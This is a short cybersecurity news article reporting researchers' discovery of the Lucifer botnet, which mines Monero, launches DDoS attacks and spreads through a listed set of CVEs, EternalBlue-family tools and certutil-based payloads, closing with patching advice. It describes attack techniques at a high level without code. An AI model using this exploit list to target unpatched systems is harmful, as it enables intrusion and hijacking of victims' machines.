This new Lucifer DDoS botnet is capable of dozen exploits to hack into a Windows OS


New Lucifer DDoS botnet can exploit a dozen vulnerabilities to hack into a Windows Operating System

Researchers have found a new DDoS botnet, dubbed as Lucifer can exploit a dozen vulnerabilities to hack into a Windows OS. The Lucifer Botnet appeared in the threat landscape, it leverages a dozen exploits for high and critical severity flaws affecting Windows systems. The Botnet not only affects system files but also turns it into a crypto mining client and could use it to launch distributed denial-of-service (DDoS) attacks.

We discovered a new variant of a hybrid cryptojacking malware from numerous incidents of CVE-2019-9081 exploitation in the wild. A closer look revealed the malware, which we’ve dubbed “Lucifer”, is capable of conducting DDoS attacks and well-equipped with all kinds of exploits against vulnerable Windows hosts.

Unit42 researchers

According to researchers, Lucifer is quite powerful in its capabilities. Not only is it capable of dropping XMRig for cryptojacking Monero, but it’s also capable of command and control (C2) operation and self-propagation through the exploitation of multiple vulnerabilities and credential brute-forcing. Additionally, it drops and runs EternalBlue, EternalRomance, and DoublePulsar backdoor against vulnerable targets for intranet infections.

The DDoS botnet causes a dozen exploits and the exhaustive list of weaponized exploits includes CVE-2014-6287, CVE-2018-1000861, CVE-2017-10271, ThinkPHP RCE vulnerabilities (CVE-2018-20062), CVE-2018-7600, CVE-2017-9791, CVE-2019-9081, PHPStudy Backdoor RCE, CVE-2017-0144, CVE-2017-0145, and CVE-2017-8464.

Lucifer once exploited, the attacker can execute arbitrary commands on the vulnerable device. In this case, the targets are Windows hosts on both the internet and intranet, given that the attacker is leveraging certutil utility in the payload for malware propagation.

These vulnerabilities are rated highly critical according to its tremendous impact inflicted on the victim. Fortunately, the patches for these vulnerabilities are readily available.

Experts spotted the botnet while investigating several attempts of exploiting the CVE-2019-9081 flaw, a critical RCE vulnerability that affects a component of the Laravel web framework. A first variant of the Lucifer bot was discovered on May 29 as part of a campaign that stopped on June 10 and that resumed on June 11 with an updated version of the bot.

Lucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms. Applying the updates and patches to the affected software are strongly advised. The vulnerable software includes Rejetto HTTP File Server, Jenkins, Oracle Weblogic, Drupal, Apache Struts, Laravel framework, and Microsoft Windows. Strong passwords are also encouraged to prevent dictionary attacks.

siad the researchers

To stay protected organizations are suggested to update the latest patch as soon as they are available to the systems. For more news on tech and cybersecurity stay tuned at Android Rookies by subscribing to our newsletter from here


About Author

Be Ready for the challenge

Notify of
Inline Feedbacks
View all comments